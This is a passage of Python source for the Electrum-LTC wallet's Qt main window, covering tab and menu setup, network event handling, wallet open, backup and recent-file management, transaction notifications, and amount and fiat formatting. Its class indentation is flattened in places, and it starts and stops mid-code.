UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI)
from electrum_ltc.transaction import Transaction, TxOutput
from electrum_ltc.address_synchronizer import AddTransactionException
from electrum_ltc.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum_ltc.version import ELECTRUM_VERSION
from electrum_ltc.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum_ltc.exchange_rate import FxThread
from electrum_ltc.simple_config import SimpleConfig
from electrum_ltc.logging import Logger
from electrum_ltc.paymentrequest import PR_PAID
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
class StatusBarButton(QPushButton):
    """Flat, fixed-size status-bar button that invokes a callback when
    clicked or when Return is pressed while it has focus."""

    def __init__(self, icon, tooltip, func):
        QPushButton.__init__(self, icon, '')
        self.func = func
        self.setToolTip(tooltip)
        self.setFlat(True)
        self.setMaximumWidth(25)
        self.setIconSize(QSize(25, 25))
        self.setCursor(QCursor(Qt.PointingHandCursor))
        self.clicked.connect(self.onPress)

    def onPress(self, checked=False):
        """Drop the unwanted PyQt5 "checked" argument and run the callback."""
        self.func()

    def keyPressEvent(self, e):
        # Activate on Return, mirroring the click behaviour.
        if e.key() == Qt.Key_Return:
            self.func()
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
    """Build the main wallet window: tabs, menu bar, status bar, keyboard
    shortcuts and (when online) the network-callback wiring."""
    QMainWindow.__init__(self)
    self.gui_object = gui_object
    self.config = config = gui_object.config  # type: SimpleConfig
    self.gui_thread = gui_object.gui_thread
    self.setup_exception_hook()
    self.network = gui_object.daemon.network  # type: Network
    assert wallet, "no wallet"
    self.wallet = wallet
    self.fx = gui_object.daemon.fx  # type: FxThread
    self.invoices = wallet.invoices
    self.contacts = wallet.contacts
    self.tray = gui_object.tray
    self.app = gui_object.app
    self.cleaned_up = False
    self.payment_request = None  # type: Optional[paymentrequest.PaymentRequest]
    self.checking_accounts = False
    self.qr_window = None
    self.not_enough_funds = False
    self.pluginsdialog = None
    self.require_fee_update = False
    self.tl_windows = []
    self.tx_external_keypairs = {}
    Logger.__init__(self)

    # incoming txs queued by on_network(); drained by notify_transactions()
    self.tx_notification_queue = queue.Queue()
    self.tx_notification_last_time = 0

    self.create_status_bar()
    self.need_update = threading.Event()

    # Display unit: fall back to the default if the stored value is unknown.
    self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
    try:
        decimal_point_to_base_unit_name(self.decimal_point)
    except UnknownBaseUnit:
        self.decimal_point = DECIMAL_POINT_DEFAULT
    self.num_zeros = int(config.get('num_zeros', 0))

    self.completions = QStringListModel()

    # Tabs: History/Send/Receive are always present; the rest are optional.
    self.tabs = tabs = QTabWidget(self)
    self.send_tab = self.create_send_tab()
    self.receive_tab = self.create_receive_tab()
    self.addresses_tab = self.create_addresses_tab()
    self.utxo_tab = self.create_utxo_tab()
    self.console_tab = self.create_console_tab()
    self.contacts_tab = self.create_contacts_tab()
    tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
    tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
    tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))

    def add_optional_tab(tabs, tab, icon, description, name):
        # Record metadata so toggle_tab() can re-insert the tab at the
        # right position later.
        tab.tab_icon = icon
        tab.tab_description = description
        tab.tab_pos = len(tabs)
        tab.tab_name = name
        if self.config.get('show_{}_tab'.format(name), False):
            tabs.addTab(tab, icon, description.replace("&", ""))

    add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
    add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
    add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
    add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")

    tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
    self.setCentralWidget(tabs)

    if self.config.get("is_maximized"):
        self.showMaximized()

    self.setWindowIcon(read_QIcon("electrum-ltc.png"))
    self.init_menubar()

    # Shortcuts use a weak proxy so the lambdas below do not keep the tab
    # widget (and thus this window) alive after close.
    wrtabs = weakref.proxy(tabs)
    QShortcut(QKeySequence("Ctrl+W"), self, self.close)
    QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
    QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
    QShortcut(QKeySequence("F5"), self, self.update_wallet)
    QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
    QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))

    for i in range(wrtabs.count()):
        # i=i binds the loop variable early (avoids late-binding closure bug)
        QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))

    self.payment_request_ok_signal.connect(self.payment_request_ok)
    self.payment_request_error_signal.connect(self.payment_request_error)
    self.history_list.setFocus(True)

    # network callbacks
    if self.network:
        self.network_signal.connect(self.on_network_qt)
        interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
                     'new_transaction', 'status',
                     'banner', 'verified', 'fee', 'fee_histogram']
        # To avoid leaking references to "self" that prevent the
        # window from being GC-ed when closed, callbacks should be
        # methods of this class only, and specifically not be
        # partials, lambdas or methods of subobjects. Hence...
        self.network.register_callback(self.on_network, interests)
        # set initial message
        self.console.showMessage(self.network.banner)
        self.network.register_callback(self.on_quotes, ['on_quotes'])
        self.network.register_callback(self.on_history, ['on_history'])
        self.new_fx_quotes_signal.connect(self.on_fx_quotes)
        self.new_fx_history_signal.connect(self.on_fx_history)
        # update fee slider in case we missed the callback
        self.fee_slider.update()

    self.load_wallet(wallet)
    gui_object.timer.timeout.connect(self.timer_actions)
    self.fetch_alias()

    # If the option hasn't been set yet
    if config.get('check_updates') is None:
        choice = self.question(title="Electrum-LTC - " + _("Enable update check"),
                               msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
                                   _("Would you like to be notified when there is a newer version of Electrum available?"))
        config.set_key('check_updates', bool(choice), save=True)

    if config.get('check_updates', False):
        # The references to both the thread and the window need to be stored somewhere
        # to prevent GC from getting in our way.
        def on_version_received(v):
            if UpdateCheck.is_newer(v):
                self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
                self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
                self.update_check_button.show()
        self._update_check_thread = UpdateCheckThread(self)
        self._update_check_thread.checked.connect(on_version_received)
        self._update_check_thread.start()
def on_history(self, b):
    # Network callback: fiat history changed; marshal to the GUI thread
    # via new_fx_history_signal (handled by on_fx_history).
    self.wallet.clear_coin_price_cache()
    self.new_fx_history_signal.emit()

def setup_exception_hook(self):
    # Install the crash-reporter exception hook for this window.
    Exception_Hook(self)

def on_fx_history(self):
    # GUI-thread handler for new_fx_history_signal.
    self.history_model.refresh('fx_history')
    self.address_list.update()

def on_quotes(self, b):
    # Network callback: new fiat quotes; marshal to the GUI thread.
    self.new_fx_quotes_signal.emit()

def on_fx_quotes(self):
    # GUI-thread handler for new_fx_quotes_signal.
    self.update_status()
    # Refresh edits with the new rate
    edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
    edit.textEdited.emit(edit.text())
    edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
    edit.textEdited.emit(edit.text())
    # History tab needs updating if it used spot
    if self.fx.history_used_spot:
        self.history_model.refresh('fx_quotes')
        self.address_list.update()
def toggle_tab(self, tab):
    """Flip the visibility of an optional tab, persist the choice in the
    config, and update its View-menu entry text."""
    key = 'show_{}_tab'.format(tab.tab_name)
    show = not self.config.get(key, False)
    self.config.set_key(key, show)
    template = _("Hide {}") if show else _("Show {}")
    tab.menu_action.setText(template.format(tab.tab_description))
    if not show:
        self.tabs.removeTab(self.tabs.indexOf(tab))
        return
    # Insert before the first tab whose recorded position is greater,
    # falling back to appending at the end.
    insert_at = len(self.tabs)
    for pos in range(len(self.tabs)):
        try:
            if tab.tab_pos < self.tabs.widget(pos).tab_pos:
                insert_at = pos
                break
        except AttributeError:
            pass  # always-present tabs carry no tab_pos
    self.tabs.insertTab(insert_at, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
def push_top_level_window(self, window):
    '''Used for e.g. tx dialog box to ensure new dialogs are appropriately
    parented. This used to be done by explicitly providing the parent
    window, but that isn't something hardware wallet prompts know.'''
    self.tl_windows.append(window)

def pop_top_level_window(self, window):
    # Counterpart of push_top_level_window().
    self.tl_windows.remove(window)

def top_level_window(self, test_func=None):
    '''Do the right thing in the presence of tx dialog windows'''
    override = self.tl_windows[-1] if self.tl_windows else None
    if override and test_func and not test_func(override):
        override = None  # only override if ok for test_func
    return self.top_level_window_recurse(override, test_func)

def diagnostic_name(self):
    # Logger hook: identify this window by its wallet.
    #return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
    return self.wallet.diagnostic_name()

def is_hidden(self):
    # True when minimized or not visible at all.
    return self.isMinimized() or self.isHidden()

def show_or_hide(self):
    # Toggle window visibility (e.g. from the tray icon).
    if self.is_hidden():
        self.bring_to_top()
    else:
        self.hide()

def bring_to_top(self):
    self.show()
    self.raise_()
def on_error(self, exc_info):
    """Route an exception (sys.exc_info() tuple) from a background task
    to the user and/or the log."""
    exc = exc_info[1]
    if isinstance(exc, UserCancelled):
        return  # user aborted; nothing to report
    if isinstance(exc, UserFacingException):
        self.show_error(str(exc))
        return
    try:
        self.logger.error("on_error", exc_info=exc_info)
    except OSError:
        pass  # see #4418
    self.show_error(repr(exc))
def on_network(self, event, *args):
    # Network-callback dispatcher; GUI work is forwarded to the GUI
    # thread through self.network_signal (see on_network_qt).
    if event == 'wallet_updated':
        wallet = args[0]
        if wallet == self.wallet:
            self.need_update.set()
    elif event == 'network_updated':
        self.gui_object.network_updated_signal_obj.network_updated_signal \
            .emit(event, args)
        self.network_signal.emit('status', None)
    elif event == 'blockchain_updated':
        # to update number of confirmations in history
        self.need_update.set()
    elif event == 'new_transaction':
        wallet, tx = args
        if wallet == self.wallet:
            # queued; drained by notify_transactions() on the GUI timer
            self.tx_notification_queue.put(tx)
    elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
        # Handle in GUI thread
        self.network_signal.emit(event, args)
    else:
        self.logger.info(f"unexpected network message: {event} {args}")
def on_network_qt(self, event, args=None):
    # Handle a network message in the GUI thread
    if event == 'status':
        self.update_status()
    elif event == 'banner':
        self.console.showMessage(args[0])
    elif event == 'verified':
        wallet, tx_hash, tx_mined_status = args
        if wallet == self.wallet:
            self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
    elif event == 'fee':
        if self.config.is_dynfee():
            self.fee_slider.update()
            self.require_fee_update = True  # picked up by timer_actions()
    elif event == 'fee_histogram':
        if self.config.is_dynfee():
            self.fee_slider.update()
            self.require_fee_update = True
        self.history_model.on_fee_histogram()
    else:
        self.logger.info(f"unexpected network_qt signal: {event} {args}")
def fetch_alias(self):
    """Resolve the configured OpenAlias in a background thread.

    Sets ``self.alias_info`` and emits ``alias_received_signal`` when the
    lookup completes. No-op when no 'alias' key is configured.
    """
    self.alias_info = None
    alias = self.config.get('alias')
    if alias:
        alias = str(alias)
        def f():
            self.alias_info = self.contacts.resolve_openalias(alias)
            self.alias_received_signal.emit()
        # daemon=True at construction replaces the deprecated
        # Thread.setDaemon() call; the thread must not block shutdown.
        t = threading.Thread(target=f, daemon=True)
        t.start()
def close_wallet(self):
    # Log the closure and give plugins a chance to clean up.
    if self.wallet:
        self.logger.info(f'close_wallet {self.wallet.storage.path}')
    run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
    """Wire the freshly opened wallet into this window and show it."""
    wallet.thread = TaskThread(self, self.on_error)
    self.update_recently_visited(wallet.storage.path)
    self.need_update.set()
    # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
    # update menus
    self.seed_menu.setEnabled(self.wallet.has_seed())
    self.update_lock_icon()
    self.update_buttons_on_seed()
    self.update_console()
    self.clear_receive_tab()
    self.request_list.update()
    self.tabs.show()
    self.init_geometry()
    # start hidden in the tray when configured and the tray is available
    if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
        self.hide()
    else:
        self.show()
    self.watching_only_changed()
    run_hook('load_wallet', wallet, self)
    try:
        wallet.try_detecting_internal_addresses_corruption()
    except InternalAddressCorruption as e:
        # surface the corruption to the user and to the crash reporter
        self.show_error(str(e))
        send_exception_to_crash_reporter(e)
def init_geometry(self):
    """Restore the saved window geometry, falling back to a default
    position/size when it is missing, malformed or off-screen."""
    winpos = self.wallet.storage.get("winpos-qt")
    try:
        screen = self.app.desktop().screenGeometry()
        # Explicit check instead of `assert` so the validation is not
        # stripped when running under `python -O`.
        if not screen.contains(QRect(*winpos)):
            raise ValueError('stored geometry is off-screen')
        self.setGeometry(*winpos)
    except Exception:
        # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt
        # are not swallowed; winpos may be None or malformed.
        self.logger.info("using default geometry")
        self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
    # Refresh the window title and enable/disable the menu entries that
    # depend on whether the wallet can sign (watching-only or not).
    name = "Electrum-LTC Testnet" if constants.net.TESTNET else "Electrum-LTC"
    title = '%s %s - %s' % (name, ELECTRUM_VERSION,
                            self.wallet.basename())
    extra = [self.wallet.storage.get('wallet_type', '?')]
    if self.wallet.is_watching_only():
        extra.append(_('watching only'))
    title += ' [%s]'% ', '.join(extra)
    self.setWindowTitle(title)
    self.password_menu.setEnabled(self.wallet.may_have_password())
    self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
    self.import_address_menu.setVisible(self.wallet.can_import_address())
    self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
    # Remind the user that a watching-only wallet cannot spend.
    if self.wallet.is_watching_only():
        msg = ' '.join([
            _("This wallet is watching-only."),
            _("This means you will not be able to spend litecoins with it."),
            _("Make sure you own the seed phrase or the private keys, before you request litecoins to be sent to this wallet.")
        ])
        self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
    """Show a one-time-per-process testnet warning with an opt-out box."""
    if not constants.net.TESTNET:
        return
    # user might have opted out already
    if self.config.get('dont_show_testnet_warning', False):
        return
    # only show once per process lifecycle
    if getattr(self.gui_object, '_warned_testnet', False):
        return
    self.gui_object._warned_testnet = True
    msg = ''.join([
        _("You are in testnet mode."), ' ',
        _("Testnet coins are worthless."), '\n',
        _("Testnet is separate from the main Bitcoin network. It is used for testing.")
    ])
    checkbox = QCheckBox(_("Don't show this again."))
    opted_out = False
    def remember_choice(state):
        nonlocal opted_out
        opted_out = state == Qt.Checked
    checkbox.stateChanged.connect(remember_choice)
    self.show_warning(msg, title=_('Testnet'), checkbox=checkbox)
    if opted_out:
        self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
    """Prompt for a wallet file and open it in a new window."""
    try:
        wallet_folder = self.get_wallet_folder()
    except FileNotFoundError as e:
        self.show_error(str(e))
        return
    filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
    if filename:
        self.gui_object.new_window(filename)
def backup_wallet(self):
    """Save a copy of the current wallet file to a user-chosen path."""
    path = self.wallet.storage.path
    wallet_folder = os.path.dirname(path)
    filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
    if not filename:
        return  # user cancelled the dialog
    new_path = os.path.join(wallet_folder, filename)
    if new_path != path:
        try:
            # copy2 preserves file metadata (timestamps, permissions)
            shutil.copy2(path, new_path)
            self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
        except BaseException as reason:
            # deliberately broad: report any failure instead of crashing
            self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
    """Move *filename* to the top of the recently-open list (max 5
    existing paths) and rebuild the "Recently open" menu."""
    recent = self.config.get('recently_open', [])
    try:
        sorted(recent)  # validates the stored value is a sortable list
    except Exception:
        # Narrowed from a bare `except:`; a corrupt config value resets
        # the list rather than aborting startup.
        recent = []
    if filename in recent:
        recent.remove(filename)
    recent.insert(0, filename)
    # Drop paths that no longer exist and cap the list length.
    recent = [path for path in recent if os.path.exists(path)]
    recent = recent[:5]
    self.config.set_key('recently_open', recent)
    self.recently_visited_menu.clear()
    for i, k in enumerate(sorted(recent)):
        b = os.path.basename(k)
        def loader(k):
            # bind k per-iteration to avoid the late-binding closure bug
            return lambda: self.gui_object.new_window(k)
        self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
    self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
    # Directory containing the currently configured wallet file.
    return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
    """Create (or restore) a wallet in the default folder via the wizard."""
    try:
        folder = self.get_wallet_folder()
    except FileNotFoundError as e:
        self.show_error(str(e))
        return
    full_path = os.path.join(folder, get_new_wallet_name(folder))
    self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
    """Construct the menu bar: File, Wallet, View, Tools and Help menus."""
    menubar = QMenuBar()

    file_menu = menubar.addMenu(_("&File"))
    self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
    file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
    file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
    file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
    file_menu.addAction(_("Delete"), self.remove_wallet)
    file_menu.addSeparator()
    file_menu.addAction(_("&Quit"), self.close)

    wallet_menu = menubar.addMenu(_("&Wallet"))
    wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
    wallet_menu.addSeparator()
    # References are kept so their enabled/visible state can be driven
    # from watching_only_changed() and load_wallet().
    self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
    self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
    self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
    self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
    self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
    self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
    self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
    wallet_menu.addSeparator()

    addresses_menu = wallet_menu.addMenu(_("&Addresses"))
    addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
    labels_menu = wallet_menu.addMenu(_("&Labels"))
    labels_menu.addAction(_("&Import"), self.do_import_labels)
    labels_menu.addAction(_("&Export"), self.do_export_labels)
    history_menu = wallet_menu.addMenu(_("&History"))
    history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
    history_menu.addAction(_("&Summary"), self.history_list.show_summary)
    history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
    history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
    contacts_menu = wallet_menu.addMenu(_("Contacts"))
    contacts_menu.addAction(_("&New"), self.new_contact_dialog)
    contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
    contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
    invoices_menu = wallet_menu.addMenu(_("Invoices"))
    invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
    invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
    wallet_menu.addSeparator()
    wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))

    def add_toggle_action(view_menu, tab):
        # One View-menu entry per optional tab (see toggle_tab).
        is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
        item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
        tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))

    view_menu = menubar.addMenu(_("&View"))
    add_toggle_action(view_menu, self.addresses_tab)
    add_toggle_action(view_menu, self.utxo_tab)
    add_toggle_action(view_menu, self.contacts_tab)
    add_toggle_action(view_menu, self.console_tab)

    tools_menu = menubar.addMenu(_("&Tools"))
    # Settings / Preferences are all reserved keywords in macOS using this as work around
    tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
    tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
    tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
    tools_menu.addSeparator()
    tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
    tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
    tools_menu.addSeparator()

    paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)

    raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
    raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
    raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
    raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
    raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
    self.raw_transaction_menu = raw_transaction_menu
    run_hook('init_menubar_tools', self, tools_menu)

    help_menu = menubar.addMenu(_("&Help"))
    help_menu.addAction(_("&About"), self.show_about)
    help_menu.addAction(_("&Check for updates"), self.show_update_check)
    help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum-ltc.org"))
    help_menu.addSeparator()
    help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
    help_menu.addAction(_("&Report Bug"), self.show_report_bug)
    help_menu.addSeparator()
    help_menu.addAction(_("&Donate to server"), self.donate_to_server)

    self.setMenuBar(menubar)
def donate_to_server(self):
    """Open a payment to the current server's donation address, if any."""
    address = self.network.get_donation_address()
    if not address:
        self.show_error(_('No donation address for this server'))
        return
    host = self.network.get_parameters().host
    self.pay_to_URI('litecoin:%s?message=donation for %s'%(address, host))
def show_about(self):
    """Display the About dialog with version and project description."""
    QMessageBox.about(self, "Electrum-LTC",
                      (_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
                       _("Electrum's focus is speed, with low resource usage and simplifying Litecoin.") + " " +
                       _("You do not need to perform regular backups, because your wallet can be "
                         "recovered from a secret phrase that you can memorize or write on paper.") + " " +
                       _("Startup times are instant because it operates in conjunction with high-performance "
                         "servers that handle the most complicated parts of the Litecoin system.") + "\n\n" +
                       _("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
    # Keep a reference on gui_object so the dialog is not garbage-collected.
    self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
    """Show bug-reporting instructions with a link to the issue tracker."""
    msg = ' '.join([
        _("Please report any bugs as issues on github:<br/>"),
        f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
        _("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
        _("Try to explain not only what the bug is, but how it occurs.")
    ])
    self.show_message(msg, title="Electrum-LTC - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
    """Drain queued incoming transactions and show tray notifications,
    rate-limited to one batch per 20 seconds."""
    if self.tx_notification_queue.qsize() == 0:
        return
    if not self.wallet.up_to_date:
        return  # no notifications while syncing
    now = time.time()
    rate_limit = 20  # seconds
    if self.tx_notification_last_time + rate_limit > now:
        return
    self.tx_notification_last_time = now
    self.logger.info("Notifying GUI about new transactions")
    txns = []
    while True:
        try:
            txns.append(self.tx_notification_queue.get_nowait())
        except queue.Empty:
            break
    # Combine the transactions if there are at least three
    if len(txns) >= 3:
        total_amount = 0
        for tx in txns:
            is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
            if not is_relevant:
                continue
            total_amount += v
        self.notify(_("{} new transactions: Total amount received in the new transactions {}")
                    .format(len(txns), self.format_amount_and_units(total_amount)))
    else:
        # few transactions: one notification each
        for tx in txns:
            is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
            if not is_relevant:
                continue
            self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
    """Show a tray balloon notification, tolerating older Qt signatures."""
    if not self.tray:
        return
    try:
        # this requires Qt 5.9
        self.tray.showMessage("Electrum-LTC", message, read_QIcon("electrum_dark_icon"), 20000)
    except TypeError:
        self.tray.showMessage("Electrum-LTC", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
    """Open-file dialog that starts in, and remembers, the last used directory."""
    directory = self.config.get('io_dir', os.path.expanduser('~'))
    selected, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
    if selected and os.path.dirname(selected) != directory:
        self.config.set_key('io_dir', os.path.dirname(selected), True)
    return selected

def getSaveFileName(self, title, filename, filter = ""):
    """Save-file dialog that starts in, and remembers, the last used directory."""
    directory = self.config.get('io_dir', os.path.expanduser('~'))
    selected, __ = QFileDialog.getSaveFileName(self, title, os.path.join(directory, filename), filter)
    if selected and os.path.dirname(selected) != directory:
        self.config.set_key('io_dir', os.path.dirname(selected), True)
    return selected
def timer_actions(self):
    """Periodic housekeeping driven by gui_object.timer."""
    # Note this runs in the GUI thread
    if self.need_update.is_set():
        self.need_update.clear()
        self.update_wallet()
    elif not self.wallet.up_to_date:
        # this updates "synchronizing" progress
        self.update_status()
    # resolve aliases
    # FIXME this is a blocking network call that has a timeout of 5 sec
    self.payto_e.resolve()
    # update fee
    if self.require_fee_update:
        self.do_update_fee()
        self.require_fee_update = False
    self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
    # Render an integer amount using the configured decimal point and
    # number of trailing zeros.
    return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)

def format_amount_and_units(self, amount):
    # Amount plus base unit, with the fiat equivalent appended in
    # parentheses when an exchange-rate source is available.
    text = self.format_amount(amount) + ' '+ self.base_unit()
    x = self.fx.format_amount_and_units(amount) if self.fx else None
    if text and x:
        text += ' (%s)'%x
    return text

def format_fee_rate(self, fee_rate):
    # fee_rate is in sat/kB
    return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'

def get_decimal_point(self):
    return self.decimal_point

def base_unit(self):
    # Display-unit name derived from the configured decimal point.
    return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
    """Keep a coin-amount edit and its fiat counterpart in sync.

    Each edit sets the other's `follows` flag while updating it
    programmatically, breaking the textChanged feedback loop.
    """
    def edit_changed(edit):
        if edit.follows:
            return  # change came from the sibling field; don't echo back
        edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
        fiat_e.is_last_edited = (edit == fiat_e)
        amount = edit.get_amount()
        rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
        if rate.is_nan() or amount is None:
            # No usable rate or empty amount: clear the opposite field(s).
            if edit is fiat_e:
                btc_e.setText("")
                if fee_e:
                    fee_e.setText("")
            else:
                fiat_e.setText("")
        else:
            if edit is fiat_e:
                btc_e.follows = True
                btc_e.setAmount(int(amount / Decimal(rate) * COIN))
                btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                btc_e.follows = False
                if fee_e:
                    window.update_fee()
            else:
                fiat_e.follows = True
                fiat_e.setText(self.fx.ccy_amount_str(
                    amount * Decimal(rate) / COIN, False))
                fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                fiat_e.follows = False
    btc_e.follows = False
    fiat_e.follows = False
    fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
    btc_e.textChanged.connect(partial(edit_changed, btc_e))
    fiat_e.is_last_edited = False
def update_status(self):
    """Refresh the balance label, tray tooltip and status icon from the
    current wallet/network state."""
    if not self.wallet:
        return
    if self.network is None:
